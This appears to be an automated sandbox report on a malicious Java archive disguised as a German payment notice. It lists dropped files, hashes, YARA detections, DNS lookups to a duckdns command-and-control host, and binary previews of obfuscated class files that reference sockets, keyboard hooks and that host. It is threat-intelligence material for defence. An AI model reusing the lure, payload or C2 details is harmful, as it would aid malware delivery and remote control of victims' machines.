                                      SHA1:B3543928B3F0378B5CA68D263ECDF817479BF1F6
                                      SHA-256:37D304436B5C7F49763DD3D1F419E79CBAA7F1743A2D556EFAD80400DDD8931C
                                      SHA-512:D90AB8D5B1820906C907B2002D272949AD35D13F6161D81A221667728AE36EC6E2FDBF006F3F9A9BD23C0DACA216F4D50126F3B66C8F6445DF997C6E3D6D07EB
                                      Malicious:false
                                      Preview:........H9........(..... .......8...........J...0...sun.rt._sync_Inflations.....$.......8...........J...0...sun.rt._sync_Deflations.....".......@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..7.......@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..6.......8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):1506993
                                      Entropy (8bit):7.990710311197979
                                      Encrypted:true
                                      SSDEEP:24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6
                                      MD5:ACFB5B5FD9EE10BF69497792FD469F85
                                      SHA1:0E0845217C4907822403912AD6828D8E0B256208
                                      SHA-256:B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E
                                      SHA-512:E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA
                                      Malicious:false
                                      Preview:PK..........^O................META-INF/....PK..........^O...L............META-INF/MANIFEST.MF.._O.0...+.;............ahehE."...cgv.}.].i...i{..s.>>.....`.....J^....{sYX.....5......[h......-....q0.6.%.|.. ..c.i../..r.-.5.0..f+.7I.;.......".IV.=.D...H.A.J_..9......M..4...W9.....6.zZ...3g..tG....3....Q..._..N.`...p.y+.n.xw4*..z+C.Y`./Jc.o..WW..;B..=.....4..Lh.~..M..Q.~.6Jp......~m..p...Z.R.V..Oq..F.U....r.a.Yh...^].?.v.b/%.=e?.kt....e..Nw..n.{.......E..].P!.h.N....N."/..._<.&..{.C!.$......O..L....,+..S..Y..9{.gX- ..R....S"...xTGm..0........*.]J.M.dT.......9.b.(....\......,'...>..].i.q/..J<.Hy..k.9H.E.J.....!.Q!....*.8...j..^.7Y..Sv..r+8..Y..4..7V........&-th..v(rZ....F.~..G.~..r.:..sj....0.-.,.....k.H[.^T.}.....UTH.)g.0..,l.6|...fr..\...t~Usz......J,....6&l}.m....M...9.cPKT1.;....h^....u.{... C...^...2%yuD.2...Z9...t.~....PK..........^O................com/PK..........^O................com/sun/PK..........^O................com/sun/jna/PK..........^O..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):2681931
                                      Entropy (8bit):5.90068240083877
                                      Encrypted:false
                                      SSDEEP:24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8
                                      MD5:2F4A99C2758E72EE2B59A73586A2322F
                                      SHA1:AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF
                                      SHA-256:24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5
                                      SHA-512:B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494
                                      Malicious:false
                                      Preview:PK..........^O................META-INF/....PK..........^O.p..E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_201-b09 (Oracle Corporation)..Implementation-Title: com.sun.jna.platform..Implementation-Vendor: JNA Development Team..Implementation-Version: 5.5.0 (b0)..Specification-Title: Java Native Access (JNA)..Specification-Vendor: JNA Development Team..Specification-Version: 5..Automatic-Module-Name: com.sun.jna.platform..Bundle-Category: jni..Bundle-ManifestVersion: 2..Bundle-Name: jna-platform..Bundle-Description: JNA Platform Library..Bundle-SymbolicName: com.sun.jna.platform..Bundle-Version: 5.5.0..Bundle-RequiredExecutionEnvironment: J2SE-1.4..Bundle-Vendor: JNA Development Team..Require-Bundle: com.sun.jna;bundle-version="5.5.0"..Export-Package: com.sun.jna.platform;version=5.5.0, com.sun.jna.platf.. orm.dnd;version=5.5.0, com.sun.jna.platform.linux;version=5.5.0, com... sun.jna.platform.mac;version=5.5.0, com.sun.jna.plat
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):238200
                                      Entropy (8bit):6.633830240784974
                                      Encrypted:false
                                      SSDEEP:6144:2ypwv+96lffpB7TrNvEMAR8sKq9dMJE6K0p+aA5J3VUfXw:XlU5RBvrNMM8RbD7T6w
                                      MD5:75A586728AA168951B1C48F28F34C553
                                      SHA1:4E150E7CBFFA43FB120876221343AF15B3332049
                                      SHA-256:9C2A20B67EDE0CC57EB3E3708EAD52D98AD6065D5A539319D771846ACFAC6A75
                                      SHA-512:586AFF19E18C0B30C9E3AA859C3DC028C2472625E98EF7C46E023118CE518CEA149F4A8FE45DC3D43ABA2E2E8A9FAEB9EF34C25FA5B745E5FA294BBCDDE04851
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: tool_paexec_strings, Description: Detects PAExec based on strings, Source: C:\Users\user\AppData\Local\Temp\lib\paexec.exe, Author: Sekoia.io
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ct.h'..;'..;'..;lm.:-..;lm.:...;lm.:3..;7..:1..;7..:3..;7..:...;lm.:4..;'..;...;o..:-..;o.c;&..;'..;&..;o..:&..;Rich'..;........................PE..L...:\.g...............).....*...............@....@..................................N....@.................................D........0..(&...........P..xR...`..........p........................... ...@............@...............................text....-.......................... ..`.rdata.......@.......2..............@..@.data...|...........................@....rsrc...(&...0...(..................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                      Category:dropped
                                      Size (bytes):4322173
                                      Entropy (8bit):7.994785882289737
                                      Encrypted:true
                                      SSDEEP:98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa
                                      MD5:B33387E15AB150A7BF560ABDC73C3BEC
                                      SHA1:66B8075784131F578EF893FD7674273F709B9A4C
                                      SHA-256:2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491
                                      SHA-512:25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279
                                      Malicious:false
                                      Preview:PK........8f>I................META-INF/PK........7f>IzVC.....s.......META-INF/MANIFEST.MF..Oo.0.....,.k..-%..P.m..U...L2..&fm....@ .E.=o~o........7H.D.".8.5..mA.....L.c..F......!.lh..4.[H.0K...![.....Tq..1...G..@.?..\...P.."ao..S.:w.}.}.t.EW...b.6..(.5a....p.8[H*..p.bH..h..&l.w....D.e.We.<..h.=.....zx.:.W.ft.......a.....$......{..{..K..0.ZfP7.N>q......FH..4.....B.....:.q4.../..^f....;....m....V.....b..u..v0.k.S.9 .....<G...@..Bl87s.....p.K.;..5.x1.i]...:.l8_./.~.-.7....g[O...U;.$(..r..../.m.E2...=....CT..6K.9....=v=.s}..OPK........We>I................META-INF/maven/PK........We>I................META-INF/maven/org.xerial/PK........We>I............&...META-INF/maven/org.xerial/sqlite-jdbc/PK........We>I................META-INF/services/PK........QT>I................org/PK........8f>I................org/sqlite/PK........8f>I................org/sqlite/core/PK........8f>I................org/sqlite/date/PK........8f>I................org/sqlite/javax/PK........8f>I..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                      Category:dropped
                                      Size (bytes):791222
                                      Entropy (8bit):7.998588520286719
                                      Encrypted:true
                                      SSDEEP:24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t
                                      MD5:E1AA38A1E78A76A6DE73EFAE136CDB3A
                                      SHA1:C463DA71871F780B2E2E5DBA115D43953B537DAF
                                      SHA-256:2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609
                                      SHA-512:FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D
                                      Malicious:false
                                      Preview:PK.........x.N................META-INF/PK.........x.N................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R....L..y..J3sJ....&.f.f...]..l.-.z.zF.\.\.PK..PSF.m.......PK........lx.N................lc/PK........lx.N................lc/kra/PK........mx.N................lc/kra/system/PK........mx.N................lc/kra/system/keyboard/PK........mx.N................lc/kra/system/keyboard/event/PK.........x.N................lc/kra/system/lib/PK........mx.N................lc/kra/system/mouse/PK........mx.N................lc/kra/system/mouse/event/PK........mx.N............"...lc/kra/system/GlobalHookMode.class.R]o.A.=...,_[.R...Z....O....6Y..m1..W.v.M.h.4.F..?.xg%.b..pO..s.;3.~......0Dl(."'!%!. .M..d..*nq.S.I..24...;..Z.z..0,.N.p.3..O...-.t.......{......Uu..M.-5.7..i.`Xy7.3ta:C.....%....q.v..a.e.N.C;..r...........n.`.z..)...j..6.....XSt..k.....=..[.;.5.{.....q...GJB...J..7.L...a.2.........6w.0M..j*..C.T.Qb..RT..3..XQ.GBE.....
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1252711
                                      Entropy (8bit):5.880198419513214
                                      Encrypted:false
                                      SSDEEP:24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp
                                      MD5:D87EC90703E5CA1D19D16A2B571A01D4
                                      SHA1:0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC
                                      SHA-256:76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF
                                      SHA-512:DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]...........!.....(...T...............@.....d.........................P.......8........ .................................0...........................................................,R......................D................................text....&.......(..................`.P`.data...8....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......8..............@.0@.bss....(....p........................`..edata...............D..............@.0@.idata..0............J..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc...............V..............@.0B/14..................Z..............@..B/29......[.......\...^..............@..B/41..........@......................@..B/55.....:*...`...,..................@..B/67.....!...........................@..B/78.....................
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1252711
                                      Entropy (8bit):5.880198419513214
                                      Encrypted:false
                                      SSDEEP:24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp
                                      MD5:D87EC90703E5CA1D19D16A2B571A01D4
                                      SHA1:0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC
                                      SHA-256:76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF
                                      SHA-512:DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]...........!.....(...T...............@.....d.........................P.......8........ .................................0...........................................................,R......................D................................text....&.......(..................`.P`.data...8....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......8..............@.0@.bss....(....p........................`..edata...............D..............@.0@.idata..0............J..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc...............V..............@.0B/14..................Z..............@..B/29......[.......\...^..............@..B/41..........@......................@..B/55.....:*...`...,..................@..B/67.....!...........................@..B/78.....................
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):12898
                                      Entropy (8bit):7.93277955179482
                                      Encrypted:false
                                      SSDEEP:192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv
                                      MD5:5B6CEE019A5BCD56303094BB15787AAC
                                      SHA1:DFE538F5DCD7910B86F50EADD502810D2A6BDDAB
                                      SHA-256:A2AF2C47293272C35DDF0A3187F190E1235E7413CF076C8A8B651EE9162DFEBD
                                      SHA-512:E729A6BB2A19FD4E18CF6AC4C5444452552594072EFB943283EA1F75A095D8F3304C466697A712D7DE9A7C8AFA387C2C07CB2824D4F0BA1FBA96FC003253C00E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar, Author: Joe Security
                                      Preview:PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u...X....[.*h..%&.*8.....%...k.r.&f..:.$..[)8G.x{....r.r..PK.....rZ...[...PK...........Z................G.class.TMS.G.}#.V... ...&..I ..........F ..v......YV1.!.T~@N>.T..k.AJ..v.*.\...W..Z.2..;.3=o^..?..... ..........C...C..M)....F......E]VB.^....../.k....".......7o........D'&..gb.f.dj..|za1...]......,.Q2f....xx!5...L...GeU..0..b..3.x.p....|..9.ojE..6}.`.Os.1.6..|..-ps..\h.X.].....O.w.@.W..U..c..`...1.>A..=....#....|....>'..gh=.[...O.5E.p..>.S.X}.L..x!'..t.|*.P+_e.R..M.n..C.^...JZT.!.{}..[.a..4?s.^..(C.q....K..;<..'.q.....I..\=Q.F.sS&...A.cL....-...A.....4..>.....p.O.V..z...)W.d.Y(...D..)...........N.x.....E.JX...$U...I.\P.d.X2..Hj^.0..6.b..u...T.......I..,..,....Jv...T..r...p.!DC...5M|.s..F].a..LM..-.;....Q).o...ih...,n.I...E.Z.C2.&s.lL.b.IB.6}g.P.r..H.*........"....ct..'......D.t.....h.{.}..CB....9B.....
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):45
                                      Entropy (8bit):0.9111711733157262
                                      Encrypted:false
                                      SSDEEP:3:/lwlt7n:WNn
                                      MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                      SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                      SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                      SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                      Malicious:false
                                      Preview:........................................J2SE.
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):8870
                                      Entropy (8bit):6.015040608113816
                                      Encrypted:false
                                      SSDEEP:96:3MbgmlLF2cpcJ2TYe3YWx4BX/euTlAWhA3wD6shIvgZ9Li1Q8ojJn7:3sgmNYciYZxxWTlAMzhIv4h3Rp7
                                      MD5:01FEA3AC89581EAAF285D15AA0208E7C
                                      SHA1:DA711D18D81D63D7DE15037B0E480E1A9EA745A9
                                      SHA-256:838ED717B79448059E07EA419727C7235A543BBBECA5C116F36ADE6234E59DB0
                                      SHA-512:B7BA0F5BDB9F84DCD61B79B0B949FB6663969A356E6718C06FBA1CADB20C9FDA3B22AEEF95D1AFF56ECD7FE227299B2E3D0D11A9A6915D17CA9C0E506C0F7D66
                                      Malicious:false
                                      Preview:.......4.....CXTKKfgE......java/lang/Object......r...g.....%java/lang/invoke/MethodHandles$Lookup......java/lang/invoke/MethodHandles......Lookup...F...Ljava/io/InputStream;...E...Ljava/lang/String;...L...B...Ljava/io/OutputStream;...J...K...D...I...k...Ljava/net/Socket;...e...h...a...G...Z...H...ALLATORIxDEMO...<clinit>...()V.. ......#...176.117.79.111..%.........'.........)...127.0.0.1..+.........-........./.........1.........3...|..5.........7.....9.........;...Default..=.........?...Unknown..A.........C.........E...jegjav.duckdns.org..G...Day3..I...(Ljava/lang/String;)V...java/lang/Throwable..L...java/lang/Exception..N...java/lang/InterruptedException..P......()I.. .S..R.T...(ILjava/lang/String;)[B.. .V..R.W...java/lang/String..Y...<init>...([B)V..[.\..Z.]...=9$. ..._..&(Ljava/lang/String;)Ljava/lang/String;.. .a....b...equals...(Ljava/lang/Object;)Z..d.e..Z.f...()Ljava/lang/String;.. .h..R.i......lastIndexOf...(Ljava/lang/String;)I..l.m..Z.n...substring...(II)Ljava/lang/String;..p
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):8618
                                      Entropy (8bit):6.0088017909748235
                                      Encrypted:false
                                      SSDEEP:192:DAvI31xZ2jYlZzRxz0hdsRgi1+mOZPzT3ID61CzA:J2kLRxz0hORgirm3o60U
                                      MD5:A4E70FF4D1899402F51C29743B3C85F2
                                      SHA1:CA6F6FCD695385C684250C43F9AA648C5504288F
                                      SHA-256:462EC1868551085AFB72BB4713FC5DA73EB5427154D4E59E2EA041AF80393BA3
                                      SHA-512:E763D90639559543330E89A4A3B9574DA28D6810C2572E4F9B898DCF3998ACA78710A36E82F6060E1B450FC6E911F21F21A3D2698A570AF784FFD40C6B9378C1
                                      Malicious:false
                                      Preview:.......4.|...E......java/lang/Object......r...ALLATORIxDEMO...()[Ljava/lang/String;...java/lang/Exception......java/net/Socket......=.y.$.z.;.......CXTKKfgE.....&(Ljava/lang/String;)Ljava/lang/String;.............<init>...(Ljava/lang/String;I)V..............#..F{.'.:It...2.IeHek^.;. \t.$K5.=H7.9k^3'.&K..1. \t+;.=.8.{SzVtN..:.;.'F.2tWdHd]t1=.bRoF,P`Ot'$.8...6-=.{SgQzUbF|-.2.*xF8.?.t!1.?.}F..&.9.{QgHdHgPlUz^bF..2.&.{SgQzUbk^%;.:.7.=.:\t.8.'.YlYl......getOutputStream...()Ljava/io/OutputStream;.............java/lang/String......getBytes...()[B.... ....!...java/io/OutputStream..#...write...([B)V..%.&..$.'...flush...()V..).*..$.+...java/lang/StringBuilder..-....*..../...getInputStream...()Ljava/io/InputStream;..1.2....3.....5...Unknown..7...java/io/InputStream..9...read...([BII)I..;.<..:.=...close..?.*....@...dWn3:.:.#...B...([BII)V....D....E...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..G.H....I...toString...()Ljava/lang/String;..K.L....M...YlYl..O...endsWith...(Ljava/lang/Strin
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):765
                                      Entropy (8bit):5.1548602300807405
                                      Encrypted:false
                                      SSDEEP:12:Uv+RfxMoSC8s0P6e+/g+iudd0ulPso7kqNUUofSjOf8E7oNV/NhkZEgU/zh1itlV:2+ZqoZ90P6J/gId+ulj71U7BD76VvnLs
                                      MD5:3567EECA2D2544FF819D55313C65C039
                                      SHA1:A73B81C80B2E5DC4138B0E88A3F46EBEDDBB465F
                                      SHA-256:2DFD9FC15E4F55CD1349118CED981AAF181EA8ACE63FC460F5A7ED3F5E8CBA13
                                      SHA-512:CDC211B1CE190B25BCD40204DF9B557F32D3C347FBCCFE38624804FF9D46D7D1979A5CD8AA9D22C0C632EFD0ACEE24FDEBFF8DCD6BECF7DA3AE49CF3457BD6A7
                                      Malicious:false
                                      Preview:.......4./...g......java/lang/Object......java/lang/Runnable......r...CXTKKfgE......<init>...()V........ALLATORIxDEMO...LCXTKKfgE;...(LCXTKKfgE;)V..................a...Lg;...run...java/lang/Exception......Z......................java/lang/Thread......sleep...(J)V.... ....!...k..#......$...java/lang/Throwable..&...Code...LineNumberTable...LocalVariableTable...StackMapTable...InnerClasses...EnclosingMethod...SourceFile. .............................(...B........*+KL+Y*............)...........*...................................(...........(.....$....."..%...W....."..%......W..................#.....+...2............'......................'...............).........F...............s.............#...$...'.].*.........(.........,...............-................
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):1639
                                      Entropy (8bit):5.454765167988992
                                      Encrypted:false
                                      SSDEEP:48:KAXQ38VTN20Prvlea1sIl+sx2vp/lo4nyn:S+ZYAlsh/lwn
                                      MD5:39D4A1BF0606FB64F1BED662E6448293
                                      SHA1:686AA7CE9BFD0167DB661D45206740428EB5B118
                                      SHA-256:81A44B356D369D87D26D16988793EF41C8C1C34B3914C3B7EADA96BB075F1113
                                      SHA-512:D875093EC1995D195B72352E8509C085FC54B7D46FAB7A8FD662D07C08917BF5C98AB54AF005F1D456CA039341D45D236F47B13301F3A4E14654A80A442F4EF0
                                      Malicious:false
                                      Preview:.......4.d...K......java/lang/Object......r...g...Ljava/nio/channels/FileLock;...H...Ljava/io/File;...ALLATORIxDEMO...Ljava/io/FileOutputStream;...<init>...(Ljava/lang/String;)V...java/lang/Exception......()V...........................................java/io/File......java/lang/StringBuilder............'.&H<.9.......CXTKKfgE.. ..&(Ljava/lang/String;)Ljava/lang/String;...."..!.#...java/lang/System..%...getProperty..'."..&.(...insert...(ILjava/lang/String;)Ljava/lang/StringBuilder;..*.+....,...separator...Ljava/lang/String;..../....0...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..2.3....4....;.?H2.8...6...toString...()Ljava/lang/String;..8.9....:.........<...a...LK;...java/lang/Throwable..@...java/lang/String..B...k...java/io/IOException..E...java/nio/channels/FileLock..G...release..I....H.J...java/io/FileOutputStream..L...close..N....M.O...(Ljava/io/File;)V....Q..M.R...getChannel..!()Ljava/nio/channels/FileChannel;..T.U..M.V...java/nio/channels/FileChannel..X...lock...()Ljava
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):91
                                      Entropy (8bit):4.946111849666226
                                      Encrypted:false
                                      SSDEEP:3:ZLCAWIzBExR8UpLVc3sRgmMgX84oxXbEDCta:1KItMFpL6sRwuoxXbXa
                                      MD5:3FB263055B3F7EED14DE15F2C21958B2
                                      SHA1:2D341C2A4AE64A8503F359479E38E093B4605046
                                      SHA-256:01A11E2B9BB27F0586017ECFBA7E40D71150F61830317AA0395D7A60704C8B7D
                                      SHA-512:0033B60BAD32ED6545E17477F815B8046CEB2E3D82BBB27780F6A60F0429DF1054CFBCF814B59DDBECCC8102B5F326D766028E54E41B35E048B825294B6E1BBE
                                      Malicious:false
                                      Preview:Manifest-Version: 1.0..Created-By: 1.8.0_381 (Oracle Corporation)..Main-Class: CXTKKfgE....
                                      Process:C:\Windows\SysWOW64\PING.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):392
                                      Entropy (8bit):4.728014748542534
                                      Encrypted:false
                                      SSDEEP:12:P95pTcgTcgTcgTcgTcgTLs4oR7n+AFSkIrxMVlmJHaVzvv:PNURD+AokItULVDv
                                      MD5:1A20F9D48A90568E8726C71FE7C9D490
                                      SHA1:3DBCB62DCFA0588D85A7A1ED71D5EED10AF82E2E
                                      SHA-256:79C8CE0C4209CCEB04EC136DEF7AA546936D288D680A15F4469352CE865A54C0
                                      SHA-512:B362A048BDCC201530C8132CEB05526BB891AF3B7CC4819AA9ABDAFEF096F598064F01BC91C24AF0348AB753F238BD698FAAC644D623E19C05BE6A66E7801794
                                      Malicious:false
                                      Preview:..Pinging 979764 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                      File type:Java archive data (JAR)
                                      Entropy (8bit):7.93277955179482
                                      TrID:
                                      • Java Archive (13504/1) 62.80%
                                      • ZIP compressed archive (8000/1) 37.20%
                                      File name:Avisierung vom 03.04.2025 Kundennummer 1084472.jar
                                      File size:12'898 bytes
                                      MD5:5b6cee019a5bcd56303094bb15787aac
                                      SHA1:dfe538f5dcd7910b86f50eadd502810d2a6bddab
                                      SHA256:a2af2c47293272c35ddf0a3187f190e1235e7413cf076c8a8b651ee9162dfebd
                                      SHA512:e729a6bb2a19fd4e18cf6ac4c5444452552594072efb943283ea1f75a095d8f3304c466697a712d7de9a7c8afa387c2c07cb2824d4f0ba1fba96fc003253c00e
                                      SSDEEP:192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv
                                      TLSH:4842BF812B60471AFA53213B43C48407FE5D059AA50C62A773C7B9A53A30D85AFE77EF
                                      File Content Preview:PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.M..LK-...K-*....R0.3..r.JM,IM.u...X....[.*h..%&..*8.....%...k.r.&f..:.$..[)8G.x{....r.r..PK.....rZ...[...PK...........Z................G.class.
                                      Icon Hash:d08c8e8ea2868a54
                                      • Total Packets: 41
                                      • 1967 undefined
                                      • 80 (HTTP)
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Apr 4, 2025 07:00:08.643171072 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | jegjav.duckdns.org | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:09.651026964 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | jegjav.duckdns.org | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:10.663887024 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | jegjav.duckdns.org | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:12.679073095 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | jegjav.duckdns.org | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:18.801630974 CEST | 192.168.2.4 | 1.1.1.1 | 0xc924 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Apr 4, 2025 07:00:13.265022993 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | jegjav.duckdns.org | | 128.90.145.126 | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:13.265078068 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | jegjav.duckdns.org | | 128.90.145.126 | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:13.265160084 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | jegjav.duckdns.org | | 128.90.145.126 | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:13.265196085 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | jegjav.duckdns.org | | 128.90.145.126 | A (IP address) | IN (0x0001) | false
                                      Apr 4, 2025 07:00:18.900382042 CEST | 1.1.1.1 | 192.168.2.4 | 0xc924 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                      Target ID:1
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\7za.exe
                                      Wow64 process (32bit):true
                                      Commandline:7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar"
